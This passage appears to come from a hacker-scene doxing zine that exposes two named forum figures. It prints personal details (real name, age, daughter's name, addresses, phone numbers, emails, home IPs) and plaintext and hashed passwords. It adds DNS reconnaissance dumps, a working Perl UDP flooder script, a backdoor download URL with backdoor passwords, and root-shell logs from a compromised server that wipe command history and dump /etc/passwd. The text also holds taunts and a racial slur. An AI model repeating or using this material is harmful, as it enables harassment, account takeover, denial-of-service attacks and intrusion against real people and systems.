ASN Name: SAUDINETSTC-AS
|
||
IP range connectivity: 5
|
||
Registrar (per ASN): RIPE
|
||
Country (per IP registrar): SA [Saudi Arabia]
|
||
Country Currency: SAR [Saudi Arabia Riyals]
|
||
Country IP Range: 77.30.0.0 to 77.31.255.255
|
||
Country fraud profile: Normal
|
||
City (per outside source): Riyadh, Ar Riyad
|
||
Country (per outside source): SA [Saudi Arabia]
|
||
Private (internal) IP? No
|
||
IP address registrar: whois.arin.net
|
||
Known Proxy? No
|
||
Link for WHOIS: 77.30.170.77
|
||
|
||
(23440,701,41,1188442878,5033,'Re: POLL - ALL MEMBERS MUST READ AND VOTE!','RoMeO','romeo.haxxor@gmail.com','89.5.78.7',1,1188492293,'0rijin4l','0rijin4l got me here','xx'),(
|
||
|
||
IP address: 89.5.78.7
|
||
Reverse DNS: dynamic.dsl.nesma.net.sa.
|
||
Reverse DNS authenticity: [Could be forged: hostname dynamic.dsl.nesma.net.sa. does not exist]
|
||
ASN: 24731
|
||
ASN Name: ASN-NESMA (National Engineering Services and Marketing Company Ltd. (NESMA))
|
||
IP range connectivity: 1
|
||
Registrar (per ASN): RIPE
|
||
Country (per IP registrar): SA [Saudi Arabia]
|
||
Country Currency: SAR [Saudi Arabia Riyals]
|
||
Country IP Range: 89.4.0.0 to 89.5.255.255
|
||
Country fraud profile: Normal
|
||
City (per outside source): Riyadh, Ar Riyad
|
||
Country (per outside source): SA [Saudi Arabia]
|
||
Private (internal) IP? No
|
||
IP address registrar: whois.ripe.net
|
||
Known Proxy? No
|
||
Link for WHOIS: 89.5.78.7
|
||
|
||
ref: http://www.gonullyourself.org/ezines/G-line/G-line.4.txt
|
||
|
||
|
||
|
||
----- darkmindz.com -----
|
||
|
||
-----------------
|
||
Host's addresses:
|
||
-----------------
|
||
darkmindz.com. 5 IN A 69.42.209.54
|
||
|
||
-------------
|
||
Name servers:
|
||
-------------
|
||
ns6.hr-development.net. 5 IN A 69.42.209.51
|
||
ns5.hr-development.net. 5 IN A 69.42.209.50
|
||
|
||
-----------
|
||
MX record:
|
||
-----------
|
||
aspmx.l.google.com. 5 IN A 209.85.219.58
|
||
|
||
---------------------
|
||
Trying Zonetransfers:
|
||
---------------------
|
||
|
||
trying zonetransfer for darkmindz.com on ns6.hr-development.net ...
|
||
|
||
trying zonetransfer for darkmindz.com on ns5.hr-development.net ...
|
||
|
||
------------------------------
|
||
Brute forcing with dns.txt:
|
||
------------------------------
|
||
ftp.darkmindz.com. 5 IN A 69.42.209.54
|
||
mail.darkmindz.com. 5 IN A 69.42.209.54
|
||
pop.darkmindz.com. 5 IN A 69.42.209.54
|
||
smtp.darkmindz.com. 5 IN A 69.42.209.54
|
||
www.darkmindz.com. 5 IN A 69.42.209.54
|
||
|
||
-------------------------------
|
||
darkmindz.com c class netranges:
|
||
-------------------------------
|
||
69.42.209.0/24
|
||
|
||
|
||
|
||
----- cybershade.org -----
|
||
|
||
-----------------
|
||
Host's addresses:
|
||
-----------------
|
||
cybershade.org. 5 IN A 69.42.209.54
|
||
|
||
-------------
|
||
Name servers:
|
||
-------------
|
||
ns6.hr-development.net. 5 IN A 69.42.209.51
|
||
ns5.hr-development.net. 5 IN A 69.42.209.50
|
||
|
||
-----------
|
||
MX record:
|
||
-----------
|
||
mail.cybershade.org. 5 IN A 69.42.209.54
|
||
|
||
---------------------
|
||
Trying Zonetransfers:
|
||
---------------------
|
||
|
||
trying zonetransfer for cybershade.org on ns6.hr-development.net ...
|
||
|
||
trying zonetransfer for cybershade.org on ns5.hr-development.net ...
|
||
|
||
------------------------------
|
||
Brute forcing with dns.txt:
|
||
------------------------------
|
||
ftp.cybershade.org. 5 IN A 69.42.209.54
|
||
mail.cybershade.org. 5 IN A 69.42.209.54
|
||
pop.cybershade.org. 5 IN A 69.42.209.54
|
||
smtp.cybershade.org. 5 IN A 69.42.209.54
|
||
www.cybershade.org. 5 IN A 69.42.209.54
|
||
|
||
-------------------------------
|
||
cybershade.org c class netranges:
|
||
-------------------------------
|
||
69.42.209.0/24
|
||
|
||
|
||
|
||
2) pimpinjg
|
||
|
||
Real Name: Jason
|
||
Country: United States
|
||
State: California
|
||
Address:
|
||
Age: 38
|
||
Birthday: July 18, 1971
|
||
Daughter Name: Dakota
|
||
Phone Number:
|
||
Nickname: pimpinjg
|
||
MSN: pimpinjg@hr-development.net
|
||
ICQ: 574404127
|
||
Skype: pimpinjg
|
||
Emails: pimpinjg@hr-development.net, pimpinjg@hotmail.com, pimpinjg4@aol.com, pimpinjg@linuxmail.org
|
||
ISP Network Range(s): 76.80.0.0 to 76.95.255.255, 76.160.0.0 to 76.175.255.255
|
||
Domains: h4ckinab0x.com, teamhbx.com, project-h4x0r.com, copyandpaste.info, anti-sec.net, pimpinjg.net, super-syn.net
|
||
Domain Hosting: hr-development.net
|
||
Domain Name Servers: ns5.hr-development.net, ns6.hr-development.net
|
||
Company: hr-development.net
|
||
Skills: DDOS Flooder and Anti-DDOS Specialist :D _none_
|
||
PsyBNC Host(s): *.deploy.akamaitechnologies.com, complete.ownage.net (72.20.17.206)
|
||
Plain Password(s): joeybe11, 1b6m9p34nz, h4ckinab0x, 1ssgy0ZACGUZFS
|
||
Hash Password(s): e93567696318487f84ea635b1e617d5a, $1$D0PGDf.U$6IyagtS0AYLnTXI4DiPmh1,
|
||
Real IP(s): 76.175.20.182, 76.175.18.227, 76.94.14.130, 76.175.18.227
|
||
Common Bash Commands: nano, wget :D
|
||
IRC Friends: RoMeO, garrett
|
||
Affiliates: thedefaced.org, darkmindz.com
|
||
Operating System(s): Ubuntu 8.10, Windows Vista
|
||
|
||
|
||
-
|
||
pimpinjg is pimpinjg@cloaked-1243C38A.deploy.akamaitechnologies.com * Pimpinjg
|
||
pimpinjg is using modes +iwrxt
|
||
pimpinig is connecting from *@cpe-76-175-20-182.socal.res.rr.com 76.175.20.182
|
||
pimpinjg is a registered nick
|
||
pimpinjg on #underground_systems #astalavista &#darkmindz
|
||
pimpinjg using twofish.securitychat.org SecurityChat.org ircd
|
||
pimpinjg has been idle 54mins 58secs, signed on Sun Jun 21 10:21:02
|
||
pimpinjg End of /WHOIS list.
|
||
|
||
|
||
|
||
/******************************************************************************************
|
||
* pimp.shell priv release for my baby joeybe11 Ballcanc3r and myself ;)
|
||
*
|
||
*
|
||
* New Mods (added by me) --
|
||
+--------------------------------------------------------+
|
||
* added proxy shit
|
||
* removed images for less crap in the logs
|
||
* added cpanel finder (thx to ackit)
|
||
* added rfi/lfi finder (thx to ackit)
|
||
* other shit i cba putting here
|
||
+--------------------------------------------------------+
|
||
* shit to remove --
|
||
+--------------------------------------------------------+
|
||
* - a bunch of stupid code things (example: echo("$msg"); (wtf... :S))
|
||
*********************************************************/
|
||
|
||
// Private 0Day Exploits, Backdoors, Shells, Privacy.. u name it.. not so private anymore..
|
||
|
||
|
||
H4ckinab0x.com on 2008-03-12 - Domain History
|
||
|
||
Registrant:
|
||
project-h4x0r
|
||
430 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
|
||
Domain Name: H4CKINAB0X.COM
|
||
Created on: 11-Mar-08
|
||
Expires on: 11-Mar-09
|
||
Last Updated on: 11-Mar-08
|
||
|
||
Administrative Contact:
|
||
Gleason, rex pimpinjg4@aol.com
|
||
project-h4x0r
|
||
430 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
(714) 529-4264 Fax --
|
||
|
||
|
||
Project-h4x0r.com on 2008-02-16 - Domain History
|
||
|
||
Registrant:
|
||
project-h4x0r
|
||
432 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
|
||
Domain Name: PROJECT-H4X0R.COM
|
||
Created on: 13-Feb-08
|
||
Expires on: 14-Feb-10
|
||
Last Updated on: 14-Feb-08
|
||
|
||
Administrative Contact:
|
||
gleason, joshua pimpinjg4@aol.com
|
||
project-h4x0r
|
||
432 west imperial highway 16
|
||
brea, California 92821
|
||
United States
|
||
(714) 529-4234 Fax --
|
||
|
||
|
||
Teamhbx.com on 2008-09-05 - Domain History
|
||
|
||
Registrant:
|
||
h4ckinab0x
|
||
234 nigger street
|
||
nigger, California 11111
|
||
United States
|
||
|
||
Domain Name: TEAMHBX.COM
|
||
Created on: 03-Sep-08
|
||
Expires on: 03-Sep-09
|
||
Last Updated on: 03-Sep-08
|
||
|
||
Administrative Contact:
|
||
nigger, nigger pimpinjg4@aol.com
|
||
h4ckinab0x
|
||
234 nigger street
|
||
nigger, California 11111
|
||
United States
|
||
111111111 Fax --
|
||
|
||
|
||
|
||
Afraid.org Domains:
|
||
|
||
h4ckinab0x.com
|
||
(5 hosts in use) website private pimpinjg 192 days ago (01/22/2009)
|
||
copyandpaste.info
|
||
(7 hosts in use) website private pimpinjg 66 days ago (05/28/2009)
|
||
super-syn.net
|
||
(6 hosts in use) website private pimpinjg 1 day ago (08/02/2009)
|
||
anti-sec.net
|
||
(6 hosts in use) website private pimpinjg 2 days ago (07/05/2009)
|
||
Ref: http://www.baccomber.com/domain/registry/?page=363&sort=3&q=
|
||
|
||
// It's amazing what u can find on the net..
|
||
|
||
|
||
pimpinjg
|
||
im pimpinjg some of you may know me some of you may not last 2 years ive been studying to become a linux administrator
|
||
(wanna start a whitehat security company) i know my shit (you can verify with ViSiOn :hihihi: yeah so sup
|
||
Ref: http://madspot.org/forums/viewtopic.php?f=7&t=11107&start=0
|
||
|
||
// How's that going for you? Managed to start your "whitehat" security company? lulz
|
||
|
||
pimpinjg
|
||
Posted 19 October 2008 - 02:05 PM
|
||
i suck at introductions so anyways here i go my names pimpinjg ive been in hacking for about 8 months i am knowledgeable
|
||
in vb,C++, and php wanting to learn asm for reverse engineering and whatnot (and some destructive shit) own a
|
||
couple warez sites wont release the urls cuz advertising so yeah sup :)
|
||
ref: http://darktavern.org/forum/General-f3/Introduction-f20/Pimpinjg-t11469.html
|
||
|
||
// 8 months? Is this a bad joke or a tragedy?
|
||
|
||
|
||
pimpinjg
|
||
is there anyway to make it auto delete suspicious files becuz im getting backdoored and im not ready for an os reload
|
||
till i get a good backup..
|
||
ref: http://forum.configserver.com/showthread.php?p=4535
|
||
|
||
// Did your lover backdoor you? Do you drop the soap on command now?
|
||
|
||
|
||
----- copyandpaste.info -----
|
||
|
||
-----------------
|
||
Host's addresses:
|
||
-----------------
|
||
copyandpaste.info. 5 IN A 76.175.20.182
|
||
|
||
-------------
|
||
Name servers:
|
||
-------------
|
||
ns2.afraid.org. 5 IN A 66.252.5.14
|
||
ns4.afraid.org. 5 IN A 67.18.179.15
|
||
ns3.afraid.org. 5 IN A 72.20.15.62
|
||
ns1.afraid.org. 5 IN A 67.19.72.206
|
||
|
||
-----------
|
||
MX record:
|
||
-----------
|
||
aspmx.l.google.com. 5 IN A 209.85.219.26
|
||
|
||
---------------------
|
||
Trying Zonetransfers:
|
||
---------------------
|
||
|
||
trying zonetransfer for copyandpaste.info on ns2.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns3.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns4.afraid.org ...
|
||
|
||
trying zonetransfer for copyandpaste.info on ns1.afraid.org ...
|
||
|
||
------------------------------
|
||
Brute forcing with dns.txt:
|
||
------------------------------
|
||
ftp.copyandpaste.info. 5 IN A 67.19.72.202
|
||
irc.copyandpaste.info. 5 IN A 94.102.58.212
|
||
mail.copyandpaste.info. 5 IN A 67.19.72.202
|
||
www.copyandpaste.info. 5 IN CNAME copyandpaste.info.
|
||
copyandpaste.info. 5 IN A 76.175.20.182
|
||
|
||
-------------------------------
|
||
copyandpaste.info c class netranges:
|
||
-------------------------------
|
||
67.19.72.0/24
|
||
76.175.20.0/24
|
||
94.102.58.0/24
|
||
|
||
|
||
WebHostingTalk Rumors
|
||
---------------------
|
||
|
||
* 7/4/2009 1:19 am Heads up - Openssh 4.3* 0day
|
||
* 6/9/2009 7:38 am Astalavista got hacked
|
||
* 5/10/2009 9:15 am Post Your Server Uptime
|
||
|
||
ref: http://www.webhostingtalk.com/profile/HRDev%20Jason
|
||
|
||
// HR-Development.net the Anti-DDOS Specialist ? aka anti-sec?
|
||
|
||
|
||
HRDev Jason HRDev Jason is offline
|
||
View Beta Profile
|
||
New Member
|
||
Join Date: Mar 2009
|
||
Posts: 3
|
||
hm, just gona put a shot in the dark here, nowayout the security expert! aka 'glafkos' and (but not limited too) astalavista staff?
|
||
|
||
ref: http://www.webhostingtalk.com/showthread.php?p=6269877#post6269877
|
||
|
||
// Hm.. Jason (pimpinjg), did the 8 months of hacking made you a security expert?
|
||
|
||
Old 06-09-2009, 08:38 AM
|
||
HRDev Jason HRDev Jason is offline
|
||
View Beta Profile
|
||
New Member
|
||
Join Date: Mar 2009
|
||
Posts: 3
|
||
looks like the same hacker group striked again?
|
||
pastebin.com/m592e1f1c
|
||
i wonder what his obsession is with astalavista staff?
|
||
and from the looks of it he has a 0day grsecurity exploit too, its getting really bad
|
||
|
||
ref: http://www.webhostingtalk.com/showthread.php?p=6227267#post6227267
|
||
|
||
// Being the anti-sec bitch, it is expected to spread misleading rumors like grsec, jail break and so on..
|
||
|
||
HRDev Jason HRDev Jason is offline
|
||
View Beta Profile
|
||
New Member
|
||
Join Date: Mar 2009
|
||
Posts: 3
|
||
This thread needs life! && bump
|
||
Intel(R) Pentium(R) 4 CPU 2.40GHz, 2gb Kingston (ddr2) ram 150GB WD HDD
|
||
[root@mercedes ~]# uptime
|
||
07:02:59 up 56 days, 20:06, 1 user, load average: 0.01, 0.05, 0.01
|
||
[root@mercedes ~]#
|
||
|
||
ref: http://www.webhostingtalk.com/showthread.php?p=6175336#post6175336
|
||
|
||
<html>
|
||
<head>
|
||
<title>romeo@mercedes~$</title> // romeo.copyandpaste.info
|
||
</head>
|
||
<body bgcolor="black" text="gray" link="gray" alink="gray" vlink="gray">
|
||
<pre>
|
||
<strong>
|
||
__ .__
|
||
_____ ____ _/ |_ |__| ______ ____ ____
|
||
\__ \ / \\ __\| | / ___/_/ __ \_/ ___\
|
||
/ __ \_| | \| | | | \___ \ \ ___/\ \___
|
||
(____ /|___| /|__| |__|/____ > \___ >\___ >
|
||
\/ \/ # rm -rf / \/ \/ \/Movement
|
||
|
||
~ Fuck full-disclosure
|
||
~ Fuck the security industry
|
||
~ Keep 0days private
|
||
~ Hack everyone you can and then hack some more
|
||
</strong>
|
||
|
||
|
||
http://i43.tinypic.com/21317c6.png // [root@mercedes ~]#
|
||
|
||
/* It is clear that you and RoMeO was sharing the same hr-dev server with the following domains:
|
||
|
||
evilzone.ws
|
||
h4ckinab0x.com
|
||
hr-development.net
|
||
phone.addresses.com
|
||
phone.theyellowpages.com
|
||
aaasoda.com
|
||
beyond-comparison.com
|
||
hotglowneon.com
|
||
yourkicksonline.com
|
||
yourkicksonline.net
|
||
blitzcraze.com
|
||
blitzdownloads.com
|
||
bloohacks.com
|
||
bootforfun.com
|
||
crypticgamers.com
|
||
crypticgamers.net
|
||
darkmindz.com
|
||
furiogaming.net
|
||
godlymods.com
|
||
h3mod.com
|
||
h4ckinab0x.com
|
||
hackordie.net
|
||
halostrike.com
|
||
iexpl0it.net
|
||
mods4hire.com
|
||
mortonnetworks.com
|
||
oinfam0uso.com
|
||
pagewizzstudio.com
|
||
phylumstudios.com
|
||
samcraft.com
|
||
scionbot.com
|
||
snayke.com
|
||
softmodding.net
|
||
teamunix.org
|
||
theconsolejunkies.com
|
||
undergr0undhackers.com
|
||
vbcoderz.com
|
||
1nesolution.com
|
||
bootforfun.com
|
||
crypticgamers.net
|
||
cybershade.org
|
||
darkmindz.com
|
||
furiogaming.com
|
||
gotmovies.net
|
||
h3mod.com
|
||
halostrike.com
|
||
keytraderz.com
|
||
samcraft.com
|
||
sounddistrict.com
|
||
theconsolejunkies.com
|
||
|
||
*/
|
||
|
||
|
||
|
||
#!/usr/bin/perl
|
||
# udp
|
||
#flooder.pl coded by pimpinjg
|
||
|
||
print q{
|
||
====================================================
|
||
= =
|
||
= Coded By =
|
||
= =
|
||
= pimpinjg =
|
||
= =
|
||
= team h4ckinab0x =
|
||
= =
|
||
= h4ckinab0x.com =
|
||
= =
|
||
====================================================
|
||
};
|
||
|
||
use io::socket;
|
||
|
||
print "Host: ";
|
||
chop ($host = <stdin>);
|
||
print "Port: ";
|
||
chop ($port = <stdin>);
|
||
|
||
{
|
||
$sock = IO::Socket::INET->new (
|
||
PeerAddr => $host,
|
||
PeerPort => $port,
|
||
Proto => 'udp') || die "$! Make sure the IP/host or port number is correct";
|
||
}
|
||
packets:
|
||
while (1) {
|
||
$size = rand() * 200 * 2000;
|
||
print ("$host:$port packet size: $size\n");
|
||
send($sock, 0, $size);
|
||
}
|
||
|
||
ref: http://www.studentshangout.com/topic/99723-udp-flodder/
|
||
|
||
// anti-ddos specialist @ hr-dev..
|
||
|
||
|
||
_______ _______ ________
|
||
\ _ \ ___ __\ _ \ \_____ \
|
||
/ /_\ \\ \/ / /_\ \ _(__ <
|
||
\ \_/ \> <\ \_/ \/ \
|
||
\_____ /__/\_ \\_____ /______ /
|
||
\/ \/ \/ \/
|
||
__
|
||
______ _ ______ _____ ____ ____ ____ _____/ |_
|
||
/ _ \ \/ \/ / \\__ \ / ___\_/ __ \ / \_/ __ \ __\ ______
|
||
( <_> ) / | \/ __ \_/ /_/ > ___/ | | \ ___/| | /_____/
|
||
\____/ \/\_/|___| (____ /\___ / \___ > /\___| /\___ >__|
|
||
\/ \//_____/ \/ \/ \/ \/
|
||
__________ _________
|
||
\______ \_______ ____ / _____/ ____ ____
|
||
| ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
|
||
| | | | \( <_> ) \ ___/\ \___
|
||
|____| |__| \____/_______ /\___ >\___ >
|
||
\/ \/ \/
|
||
|
||
|
||
|
||
/*
|
||
Random Backdoor Passwords: Sk3rhGLdYW, 0x3a0wnt, RAzDX1lFd8
|
||
Backdoor http://board.whois.co.kr/lol.tar.gz (malloc is your enemy)
|
||
*/
|
||
|
||
This is a private computer system which is restricted to authorized individuals.
|
||
Actual or attempted unauthorized use of this computer system will result in criminal
|
||
and/or civil prosecution. This system is owned by Vitalspeeds Corporation of Wisconsin.
|
||
To purchase an account please visit us at http://www.vitalspeeds.com.
|
||
|
||
FreeBSD 6.2-RELEASE-p3 (VITAL) #0: Sun Apr 15 19:59:55 PDT 2007
|
||
|
||
|
||
Welcome
|
||
to
|
||
___ ___ __ __ __ __
|
||
| | |__| |_.---.-.| |.-----.-----.-----.-----.--| |.-----.
|
||
| | | | _| _ || ||__ --| _ | -__| -__| _ ||__ --|
|
||
\_____/|__|____|___._||__||_____| __|_____|_____|_____||_____|
|
||
|__|
|
||
|
||
|
||
|
||
By entering or accessing this server, you hereby agree to the Acceptable
|
||
Use Policy and any other terms and conditions listed on our website.
|
||
|
||
Type 'vhosts' for a list of the virtual hosts that can be used on
|
||
this system. You can view this again by typing 'motd'.
|
||
|
||
Support can be obtained in #vitalspeeds on EFnet.
|
||
|
||
http://www.vitalspeeds.com/
|
||
|
||
|
||
Perm - All support requests should go through our Ticket system @
|
||
https://billing.vitalspeeds.com or IRC@EFnet #Vitalspeeds .
|
||
|
||
Commands: vhosts, BitchX
|
||
NOTE: Eggdrop/BNCS use ports over 35000.
|
||
|
||
April 12 2007 : Hard drive failure, all data is gone as we do not keep backups of shell accounts as per the terms of
|
||
service. Check your welcome email for user info etc.
|
||
|
||
+----------------------------[ Owned ]----------------------------+
|
||
| Hack everyone you can and then hack some more | // romeo.copyandpaste.info
|
||
| Owned[DC] v2 |
|
||
| _______ . _______ . _______ |
|
||
| Get in as anonymous, Leave with no trace. |
|
||
| |
|
||
+-----------------------------------------------------------------+
|
||
[ FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 i386 ]
|
||
|
||
6:30PM up 518 days, 6:58, 2 users, load averages: 0.33, 0.26, 0.24
|
||
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 18:12 still logged in
|
||
yaquis ttyp1 ip72-223-92-235. Sun Jun 28 17:00 - 17:39 (00:38)
|
||
katsst ttyp1 cpe-75-84-149-5. Sun Jun 28 16:07 - 16:37 (00:30)
|
||
dark ftp modemcable089.1 Sun Jun 28 15:45 - 15:45 (00:00)
|
||
smash ttyp1 89.30.147.8 Sun Jun 28 15:30 - 15:50 (00:19)
|
||
[root@velocity:~]# w
|
||
6:30PM up 518 days, 6:58, 2 users, load averages: 0.43, 0.28, 0.25
|
||
USER TTY FROM LOGIN@ IDLE WHAT
|
||
romeo p0 :ttyp2:S.0 Thu11PM - irssi -h absolute.ownage.net
|
||
yaquis p1 ip72-223-92-235. 6:12PM - -bash (bash)
|
||
|
||
|
||
[root@velocity:~]# export HISTSIZE=0
|
||
[root@velocity:~]# export HISTFILE=/dev/null
|
||
[root@velocity:~]# env
|
||
TERM=vt100
|
||
SHELL=/usr/local/bin/bash
|
||
HISTSIZE=1500
|
||
SSH_CLIENT=1.3.3.7 6173 22
|
||
SSH_TTY=/dev/ttyp1
|
||
USER=root
|
||
SSH_AUTH_SOCK=/tmp/ssh-M0YqjqZvAN/agent.70342
|
||
PAGER=more
|
||
LSCOLORS=ExGxFxf5CxfgDxabagacad
|
||
MAIL=/var/mail/root
|
||
PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/sbin:/usr/local/bin:/usr/X11R6/bin
|
||
PWD=/root
|
||
EDITOR=pico
|
||
PS1=[\u@\h:\w]\$
|
||
SHLVL=1
|
||
HOME=/root
|
||
LOGNAME=root
|
||
SSH_CONNECTION=1.3.3.7 6173 72.20.28.205 22
|
||
HISTFILE=/dev/null
|
||
_=/usr/bin/env
|
||
[root@velocity:~]# w
|
||
7:36PM up 513 days, 8:04, 2 users, load averages: 0.43, 0.48, 0.43
|
||
USER TTY FROM LOGIN@ IDLE WHAT
|
||
romeo p9 :ttypf:S.0 Wed06AM 1 irssi -h absolute.ownage.net
|
||
pimpinjg pe cpe-76-175-20-18 Mon09PM 1:15 irssi -h 72.20.28.206 // points to copyandpaste.info
|
||
[root@velocity:/]# date
|
||
Tue Jun 23 20:30:52 CDT 2009
|
||
[root@velocity:/]# uname -a
|
||
FreeBSD velocity.vitalspeeds.com 6.2-RELEASE-p3 FreeBSD 6.2-RELEASE-p3 #0: Sun Apr 15 19:59:55 PDT 2007 root@velocity.vitalspeeds.com:/usr/obj/usr/src/sys/VITAL i386
|
||
|
||
[root@velocity:~]# sysctl -a | egrep -i 'hw.machine|hw.model|hw.ncpu'
|
||
hw.machine: i386
|
||
hw.model: Intel(R) Pentium(R) 4 CPU 2.80GHz
|
||
hw.ncpu: 1
|
||
hw.machine_arch: i386
|
||
|
||
|
||
[root@velocity:~]# ls -la
|
||
total 72
|
||
drwxr-xr-x 6 root wheel 512 Jun 26 02:08 ./
|
||
drwxr-xr-x 21 root wheel 512 Nov 5 2008 ../
|
||
-rw------- 1 root wheel 4356 Jun 11 08:02 .bash_history
|
||
-rw-r--r-- 2 root wheel 801 Jan 12 2007 .cshrc
|
||
-rw------- 1 root wheel 5 Apr 15 2007 .history
|
||
drwx------ 2 root wheel 512 Jun 11 10:25 .irssi/
|
||
-rw-r--r-- 1 root wheel 143 Jan 12 2007 .k5login
|
||
-rw------- 1 root wheel 35 Jun 25 16:35 .lesshst
|
||
-rw-r--r-- 1 root wheel 293 Jan 12 2007 .login
|
||
-rw------- 1 root wheel 2164 Jun 23 20:21 .lsof_velocity
|
||
-rw-r--r-- 2 root wheel 251 Jan 12 2007 .profile
|
||
drwx------ 2 root wheel 512 Apr 13 2007 .ssh/
|
||
drwxr-xr-x 2 root wheel 512 Jun 24 18:00 kernels/
|
||
drwxr-xr-x 2 root wheel 512 Nov 5 2008 supfiles/
|
||
-rwxr--r-- 1 root wheel 477 Nov 5 2008 update.sh*
|
||
|
||
[root@velocity:~]# lsof -i -n | grep ssh
|
||
sshd 43929 devil 3u IPv4 0xca224000 0t0 TCP *:search (LISTEN)
|
||
sshd 43929 devil 5u IPv6 0xca6b5cb0 0t0 TCP *:search (LISTEN)
|
||
sshd 43929 devil 7u IPv4 0xca0653a0 0t0 TCP 72.20.3.98:search->189.158.227.97:1036 (ESTABLISHED)
|
||
sshd 43929 devil 87u IPv4 0xcafd2570 0t0 TCP 72.20.28.196:51129->69.16.172.40:afs3-fileserver (ESTABLISHED)
|
||
sshd 43929 devil 154u IPv4 0xc98913a0 0t0 TCP 72.20.28.210:52054->82.196.213.250:ircd (ESTABLISHED)
|
||
sshd 43929 devil 167u IPv4 0xcc5a73a0 0t0 TCP 72.20.28.196:49651->84.208.29.17:afs3-fileserver (ESTABLISHED)
|
||
sshd 43929 devil 192u IPv4 0xcb023910 0t0 TCP 72.20.28.196:50866->69.16.172.34:afs3-fileserver (ESTABLISHED)
|
||
sshd 60220 root 3u IPv4 0xc92c9000 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10662 (ESTABLISHED) // RoMeO Saudi Arabia
|
||
sshd 60382 root 3u IPv4 0xc50a51d0 0t0 TCP 72.20.28.248:ssh->188.52.81.126:10696 (ESTABLISHED)
|
||
sshd 64492 root 3u IPv6 0xcc1883a0 0t0 TCP *:ssh (LISTEN)
|
||
sshd 64492 root 4u IPv4 0xc970d3a0 0t0 TCP *:ssh (LISTEN)
|
||
sshd 74777 root 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
|
||
sshd 74779 ioplex 3u IPv4 0xc9dd8570 0t0 TCP 72.20.28.248:ssh->66.229.253.149:27655 (ESTABLISHED)
|
||
sshd 74779 ioplex 7u IPv4 0xc9f58cb0 0t0 TCP 127.0.0.1:56073->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 8u IPv4 0xc91ff1d0 0t0 TCP 127.0.0.1:57500->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 9u IPv4 0xc6230910 0t0 TCP 127.0.0.1:64660->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 10u IPv4 0xc9a37ae0 0t0 TCP 127.0.0.1:49761->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 12u IPv4 0xc9a93740 0t0 TCP 127.0.0.1:64920->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 13u IPv4 0xc97d21d0 0t0 TCP 127.0.0.1:52350->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 14u IPv4 0xc5c30000 0t0 TCP 127.0.0.1:51650->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 15u IPv4 0xca1cf1d0 0t0 TCP 127.0.0.1:49153->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 16u IPv4 0xcc1731d0 0t0 TCP 127.0.0.1:51808->127.0.0.1:48259 (ESTABLISHED)
|
||
sshd 74779 ioplex 17u IPv4 0xcc592cb0 0t0 TCP 127.0.0.1:53451->127.0.0.1:48259 (ESTABLISHED)
|
||
[root@velocity:~]#
|
||
|
||
[root@velocity:/var/run]# cat /etc/passwd
|
||
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
|
||
#
|
||
root:*:0:0:Charlie &:/root:/usr/local/bin/bash
|
||
toor:*:0:0:Bourne-again Superuser:/root:
|
||
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
|
||
operator:*:2:5:System &:/:/usr/sbin/nologin
|
||
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
|
||
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
|
||
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
|
||
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
|
||
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
|
||
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
|
||
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
|
||
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
|
||
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
|
||
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
|
||
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
|
||
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
|
||
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
|
||
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
|
||
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
|
||
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
|
||
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
|
||
nsc:*:1001:0:User &:/home/nsc:/bin/sh
|
||
sysc:*:1002:1002:User &:/home/sysc:/usr/local/bin/bash
|
||
vividbreeze:*:1003:1003:User &:/home/vividbreeze:/usr/local/bin/bash
|
||
sharpie:*:1036:1036:User &:/home/sharpie:/usr/local/bin/bash
|
||
cappy57:*:1038:1038:User &:/home/cappy57:/usr/local/bin/bash
|
||
zoo:*:1039:1039:User &:/home/zoo:/usr/local/bin/bash
|
||
dark:*:1041:1041:User &:/home/dark:/usr/local/bin/bash
|
||
evino:*:1042:1042:User &:/home/evino:/usr/local/bin/bash
|
||
dano30:*:1043:1043:User &:/home/dano30:/usr/local/bin/bash
|
||
daali:*:1044:1044:User &:/home/daali:/usr/local/bin/bash
|
||
skit:*:1045:1045:User &:/home/skit:/usr/local/bin/bash
|
||
l33t:*:1047:1047:User &:/home/l33t:/usr/local/bin/bash
|
||
